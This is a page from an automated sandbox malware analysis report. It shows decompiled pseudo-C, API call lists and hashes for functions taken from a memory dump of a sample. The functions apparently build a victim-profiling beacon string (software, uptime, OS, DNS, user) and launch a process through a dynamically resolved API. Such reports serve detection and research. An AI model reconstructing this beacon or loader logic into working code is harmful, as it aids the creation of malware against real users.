                            • Opcode ID: 9fa5e50f2c9370c7c62c5d362c447ecc6118553d5d7e5e9f8d9a7eb002668ce2
                            • Instruction ID: 92b16257ebc86c4c5079c1877bb79455dd9827b12afd0060210bd122e575cbc0
                            • Opcode Fuzzy Hash: 9fa5e50f2c9370c7c62c5d362c447ecc6118553d5d7e5e9f8d9a7eb002668ce2
                            • Instruction Fuzzy Hash: 4261EF30E046429FDB69CF28D8986B973A7FB853A4F28856BD856C7391EF31DC428741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D82FC Relevance: .1, Instructions: 77COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 71%
                            			E006D82FC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E006D8467(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E006D8521(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E006D840C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E006D8467(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E006D8503(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                            0x006d8300
                            0x006d8301
                            0x006d8302
                            0x006d8305
                            0x006d8307
                            0x006d830a
                            0x006d830b
                            0x006d830d
                            0x006d830e
                            0x006d830f
                            0x006d8312
                            0x006d831c
                            0x006d83cd
                            0x006d83d4
                            0x006d83dd
                            0x006d8322
                            0x006d8322
                            0x006d8328
                            0x006d832e
                            0x006d8331
                            0x006d8334
                            0x006d8338
                            0x006d833d
                            0x006d8342
                            0x006d83c2
                            0x00000000
                            0x006d8344
                            0x006d8344
                            0x006d8350
                            0x006d8352
                            0x006d83ad
                            0x006d83ad
                            0x006d83b3
                            0x00000000
                            0x006d8354
                            0x006d8363
                            0x006d8365
                            0x006d8366
                            0x006d8367
                            0x006d836a
                            0x006d836a
                            0x006d836c
                            0x00000000
                            0x006d836e
                            0x006d836e
                            0x006d83b8
                            0x006d8370
                            0x006d8370
                            0x006d8374
                            0x006d837c
                            0x006d8381
                            0x006d8386
                            0x006d8392
                            0x006d839a
                            0x006d83a1
                            0x006d83a7
                            0x006d83ab
                            0x00000000
                            0x006d83ab
                            0x006d836e
                            0x006d836c
                            0x00000000
                            0x006d8352
                            0x006d83c6
                            0x006d83c6
                            0x006d83c6
                            0x006d8342
                            0x006d83e2
                            0x006d83e9

                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction ID: 2d80baf9cf364e92103630843da4e1af34cd7304462139cd3715fa246bd72813
                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction Fuzzy Hash: 1021B672D002049FCB10DFA9C8859ABB7A6FF44350B468569E9599B345DB30F915C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D6CA4 Relevance: 37.8, APIs: 25, Instructions: 278memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E006D6CA4(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x6da018; // 0xc9f186aa
				asm("bswap eax");
				_t70 =  *0x6da014; // 0x3a87c8cd
				asm("bswap eax");
				_t71 =  *0x6da010; // 0xd8d2f808
				asm("bswap eax");
				_t72 =  *0x6da00c; // 0xeec43f25
				asm("bswap eax");
				_t73 =  *0x6da348; // 0xdcd5a8
				_t3 = _t73 + 0x6db62b; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d186, _t72, _t71, _t70, _t69,  *0x6da02c,  *0x6da004, _t68);
				_t76 = E006D1308();
				_t77 =  *0x6da348; // 0xdcd5a8
				_t4 = _t77 + 0x6db66b; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x6da348; // 0xdcd5a8
					_t8 = _t148 + 0x6db676; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x6da348; // 0xdcd5a8
				_t10 = _t81 + 0x6db78e; // 0x14a8d36
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x6db2de; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x6da36c; // 0x14a95b0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x6da348; // 0xdcd5a8
					_t16 = _t144 + 0x6db889; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E006D3DE0(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x6da348; // 0xdcd5a8
					_t19 = _t139 + 0x6db8c2; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x6da2d8, 0, _a40);
				}
				_t87 = E006D3ACA();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x6da348; // 0xdcd5a8
					_t23 = _t135 + 0x6db8ca; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x6da2d8, 0, _a40);
				}
				_t166 =  *0x6da3cc; // 0x14a9600
				_t89 = E006D4B69(0x6da00a, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x6da2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x6da2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x6da2d8, _t172, _a8);
						goto L30;
					}
					E006D53AE(GetTickCount());
					_t96 =  *0x6da3cc; // 0x14a9600
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x6da3cc; // 0x14a9600
					__imp__(_t100 + 0x40);
					_t102 =  *0x6da3cc; // 0x14a9600
					_t168 = E006D2281(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x6da2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x6d9280);
					_push(_t168);
					_t108 = E006D6311();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x6da2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E006D3D2E( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E006D14C6();
						L26:
						HeapFree( *0x6da2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E006D7446(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E006D1335(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E006D789E(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E006D5F92(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E006D789E(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}






























































                            0x006d6ca4
                            0x006d6ca4
                            0x006d6ca8
                            0x006d6caf
                            0x006d6cb9
                            0x006d6cbb
                            0x006d6cbb
                            0x006d6cc8
                            0x006d6cd3
                            0x006d6cd6
                            0x006d6ce1
                            0x006d6ce4
                            0x006d6ce9
                            0x006d6cec
                            0x006d6cf1
                            0x006d6cf4
                            0x006d6d00
                            0x006d6d0d
                            0x006d6d0f
                            0x006d6d15
                            0x006d6d1a
                            0x006d6d25
                            0x006d6d27
                            0x006d6d2a
                            0x006d6d31
                            0x006d6d33
                            0x006d6d3c
                            0x006d6d47
                            0x006d6d49
                            0x006d6d4c
                            0x006d6d4c
                            0x006d6d4e
                            0x006d6d53
                            0x006d6d53
                            0x006d6d5b
                            0x006d6d5f
                            0x006d6d65
                            0x006d6d70
                            0x006d6d72
                            0x006d6d77
                            0x006d6d7c
                            0x006d6d7f
                            0x006d6d84
                            0x006d6d8f
                            0x006d6d91
                            0x006d6d94
                            0x006d6d94
                            0x006d6d96
                            0x006d6da1
                            0x006d6da7
                            0x006d6daa
                            0x006d6daf
                            0x006d6dba
                            0x006d6dbc
                            0x006d6dc3
                            0x006d6dcd
                            0x006d6dcd
                            0x006d6dcf
                            0x006d6dd4
                            0x006d6dda
                            0x006d6ddd
                            0x006d6de2
                            0x006d6dec
                            0x006d6dee
                            0x006d6dfd
                            0x006d6dfd
                            0x006d6dff
                            0x006d6e0d
                            0x006d6e12
                            0x006d6e14
                            0x006d6e1a
                            0x006d6ffa
                            0x006d7002
                            0x006d700f
                            0x006d6e20
                            0x006d6e2c
                            0x006d6e32
                            0x006d6e38
                            0x006d6fed
                            0x006d6ff8
                            0x00000000
                            0x006d6ff8
                            0x006d6e44
                            0x006d6e49
                            0x006d6e52
                            0x006d6e63
                            0x006d6e67
                            0x006d6e70
                            0x006d6e76
                            0x006d6e83
                            0x006d6e90
                            0x006d6e96
                            0x006d6fe0
                            0x006d6feb
                            0x00000000
                            0x006d6feb
                            0x006d6ea2
                            0x006d6ea8
                            0x006d6ea9
                            0x006d6eae
                            0x006d6eb4
                            0x006d6fd6
                            0x006d6fde
                            0x00000000
                            0x006d6fde
                            0x006d6ebe
                            0x006d6ec5
                            0x006d6ecf
                            0x006d6ed5
                            0x006d6edf
                            0x006d6ef1
                            0x006d6ef3
                            0x006d6ef9
                            0x006d7012
                            0x006d6fc1
                            0x006d6fc1
                            0x006d6fc6
                            0x006d6fd2
                            0x006d6fd4
                            0x00000000
                            0x006d6fd4
                            0x006d6f04
                            0x006d6f09
                            0x006d6f0f
                            0x006d6f1a
                            0x006d6f25
                            0x006d6f29
                            0x006d6f2f
                            0x006d6f35
                            0x006d6f3b
                            0x006d6f3e
                            0x006d6f44
                            0x006d6f47
                            0x006d6f4c
                            0x006d6f50
                            0x006d6f50
                            0x006d6f5d
                            0x006d6f6b
                            0x006d6f70
                            0x006d6f72
                            0x006d6f78
                            0x006d6f7e
                            0x006d6f80
                            0x006d6f85
                            0x006d6f89
                            0x006d6fa5
                            0x006d6fa5
                            0x006d6f78
                            0x00000000
                            0x006d6f5f
                            0x006d6f64
                            0x006d6fa7
                            0x006d6fab
                            0x006d6fb5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d6fb5
                            0x006d6f66
                            0x00000000
                            0x006d6f66
                            0x006d6f5d

                            APIs
                            • GetTickCount.KERNEL32 ref: 006D6CBB
                            • wsprintfA.USER32 ref: 006D6D08
                            • wsprintfA.USER32 ref: 006D6D25
                            • wsprintfA.USER32 ref: 006D6D47
                            • wsprintfA.USER32 ref: 006D6D6E
                            • wsprintfA.USER32 ref: 006D6D8F
                            • wsprintfA.USER32 ref: 006D6DBA
                            • HeapFree.KERNEL32(00000000,?), ref: 006D6DCD
                            • wsprintfA.USER32 ref: 006D6DEC
                            • HeapFree.KERNEL32(00000000,?), ref: 006D6DFD
                              • Part of subcall function 006D4B69: RtlEnterCriticalSection.NTDLL(014A95C0), ref: 006D4B85
                              • Part of subcall function 006D4B69: RtlLeaveCriticalSection.NTDLL(014A95C0), ref: 006D4BA3
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 006D6E2C
                            • GetTickCount.KERNEL32 ref: 006D6E3E
                            • RtlEnterCriticalSection.NTDLL(014A95C0), ref: 006D6E52
                            • RtlLeaveCriticalSection.NTDLL(014A95C0), ref: 006D6E70
                              • Part of subcall function 006D2281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22AC
                              • Part of subcall function 006D2281: lstrlen.KERNEL32(00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22B4
                              • Part of subcall function 006D2281: strcpy.NTDLL ref: 006D22CB
                              • Part of subcall function 006D2281: lstrcat.KERNEL32(00000000,00000000), ref: 006D22D6
                              • Part of subcall function 006D2281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D22F3
                            • StrTrimA.SHLWAPI(00000000,006D9280,?,014A9600), ref: 006D6EA2
                              • Part of subcall function 006D6311: lstrlen.KERNEL32(014A9BD0,00000000,00000000,00000000,006D385C,00000000), ref: 006D6321
                              • Part of subcall function 006D6311: lstrlen.KERNEL32(?), ref: 006D6329
                              • Part of subcall function 006D6311: lstrcpy.KERNEL32(00000000,014A9BD0), ref: 006D633D
                              • Part of subcall function 006D6311: lstrcat.KERNEL32(00000000,?), ref: 006D6348
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D6EC5
                            • lstrcpy.KERNEL32(?,?), ref: 006D6ECF
                            • lstrcat.KERNEL32(?,?), ref: 006D6EDF
                            • lstrcat.KERNEL32(?,00000000), ref: 006D6EE6
                              • Part of subcall function 006D3D2E: lstrlen.KERNEL32(?,00000000,014A9DE0,00000000,006D695F,014AA003,69B25F44,?,?,?,?,69B25F44,00000005,006DA00C,4D283A53,?), ref: 006D3D35
                              • Part of subcall function 006D3D2E: mbstowcs.NTDLL ref: 006D3D5E
                              • Part of subcall function 006D3D2E: memset.NTDLL ref: 006D3D70
                            • wcstombs.NTDLL ref: 006D6F89
                              • Part of subcall function 006D1335: SysAllocString.OLEAUT32(?), ref: 006D1370
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            • HeapFree.KERNEL32(00000000,?), ref: 006D6FD2
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 006D6FDE
                            • HeapFree.KERNEL32(00000000,?,?,014A9600), ref: 006D6FEB
                            • HeapFree.KERNEL32(00000000,?), ref: 006D6FF8
                            • HeapFree.KERNEL32(00000000,?), ref: 006D7002
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
                            • String ID:
                            • API String ID: 1185349883-0
                            • Opcode ID: ac9e80cf48bec58839d187bdbcd9166ce1abdfb095c54725be404246d7a9fc5e
                            • Instruction ID: 73e3f92deabb1294c1ed95162622e5232200e5a7f8be4bc09a2f5bffb3a96f7a
                            • Opcode Fuzzy Hash: ac9e80cf48bec58839d187bdbcd9166ce1abdfb095c54725be404246d7a9fc5e
                            • Instruction Fuzzy Hash: 75A19C71D0A210AFC711AFA5EC44E9A7BEBEF88314F0A142AF449D7361D731D905DB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D41C5 Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 55%
                            			E006D41C5(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x6da3dc; // 0x14a9c88
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E006D540A();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E006D540A();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E006D2C2A(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E006D2C2A(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E006D5C2F(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x6d918c;
						}
						_t70 = E006D224E(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E006D7A71(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x6da348; // 0xdcd5a8
								_t28 = _t105 + 0x6dbb08; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E006D5C2F(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x6d9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E006D7A71(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E006D789E(_v24);
								} else {
									_t92 =  *0x6da348; // 0xdcd5a8
									_t44 = _t92 + 0x6dbc80; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E006D789E(_v8);
						}
						E006D789E(_v12);
					}
					E006D789E(_v16);
				}
				return _v28;
			}


































                            0x006d41cb
                            0x006d41d3
                            0x006d41d6
                            0x006d41e3
                            0x006d41e6
                            0x006d41ed
                            0x006d41f4
                            0x006d41f7
                            0x006d4204
                            0x006d4207
                            0x006d420a
                            0x006d420f
                            0x006d4214
                            0x006d421c
                            0x006d4221
                            0x006d4226
                            0x006d422c
                            0x006d4230
                            0x006d4239
                            0x006d423d
                            0x006d423f
                            0x006d423f
                            0x006d4247
                            0x006d424c
                            0x006d4251
                            0x006d4257
                            0x006d425e
                            0x006d426f
                            0x006d4276
                            0x006d4288
                            0x006d428d
                            0x006d4292
                            0x006d429b
                            0x006d42ad
                            0x006d42c3
                            0x006d42c8
                            0x006d42cc
                            0x006d42d0
                            0x006d42d5
                            0x006d42da
                            0x006d42dc
                            0x006d42dc
                            0x006d42e6
                            0x006d42ef
                            0x006d42f6
                            0x006d4312
                            0x006d4316
                            0x006d434f
                            0x006d4318
                            0x006d431b
                            0x006d4323
                            0x006d4334
                            0x006d433c
                            0x006d4344
                            0x006d4348
                            0x006d4348
                            0x006d4316
                            0x006d4357
                            0x006d4357
                            0x006d435f
                            0x006d435f
                            0x006d4367
                            0x006d4367
                            0x006d4373

                            APIs
                            • GetTickCount.KERNEL32 ref: 006D41DD
                            • lstrlen.KERNEL32(00000000,00000005), ref: 006D425E
                            • lstrlen.KERNEL32(?), ref: 006D426F
                            • lstrlen.KERNEL32(00000000), ref: 006D4276
                            • lstrlenW.KERNEL32(80000002), ref: 006D427D
                            • wsprintfW.USER32 ref: 006D42C3
                            • lstrlen.KERNEL32(?,00000004), ref: 006D42E6
                            • lstrlen.KERNEL32(?), ref: 006D42EF
                            • lstrlen.KERNEL32(?), ref: 006D42F6
                            • lstrlenW.KERNEL32(?), ref: 006D42FD
                            • wsprintfW.USER32 ref: 006D4334
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrlen$wsprintf$CountFreeHeapTick
                            • String ID:
                            • API String ID: 822878831-0
                            • Opcode ID: 7531ce7e9207a1441ebdde014b75e6c9de67f9e7221373395eb158ee5211b7e1
                            • Instruction ID: 160765277b6df902223264acbc22fe345283d3d6d767d90e19766e92c2bd2aae
                            • Opcode Fuzzy Hash: 7531ce7e9207a1441ebdde014b75e6c9de67f9e7221373395eb158ee5211b7e1
                            • Instruction Fuzzy Hash: 38516A72D0021AABCF12AFA9DC45ADE7BB3EF44314F15406AF904A7321DB358E11DBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D3BF0 Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E006D3BF0(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E006D2AA6(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E006D7A86( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x6da300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x6da348; // 0xdcd5a8
					_t18 = _t47 + 0x6db3f3; // 0x73797325
					_t68 = E006D3A12(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x6da348; // 0xdcd5a8
						_t19 = _t50 + 0x6db73f; // 0x14a8ce7
						_t20 = _t50 + 0x6db0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E006D2058();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E006D2058();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x6da2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E006D789E(_t70);
				goto L12;
			}


















                            0x006d3bf8
                            0x006d3bf8
                            0x006d3c07
                            0x006d3c0e
                            0x006d3c13
                            0x006d3d20
                            0x006d3d27
                            0x006d3d27
                            0x006d3c22
                            0x006d3c2a
                            0x006d3c2d
                            0x006d3c32
                            0x006d3c47
                            0x006d3c4d
                            0x006d3c4e
                            0x006d3c51
                            0x006d3c57
                            0x006d3c5a
                            0x006d3c5f
                            0x006d3c67
                            0x006d3c73
                            0x006d3c77
                            0x006d3d07
                            0x006d3c7d
                            0x006d3c7d
                            0x006d3c82
                            0x006d3c89
                            0x006d3c9d
                            0x006d3ca1
                            0x006d3cf0
                            0x006d3ca3
                            0x006d3ca4
                            0x006d3cab
                            0x006d3cc4
                            0x006d3cc6
                            0x006d3cca
                            0x006d3cd1
                            0x006d3ceb
                            0x006d3cd3
                            0x006d3cdc
                            0x006d3ce1
                            0x006d3ce1
                            0x006d3cd1
                            0x006d3cff
                            0x006d3cff
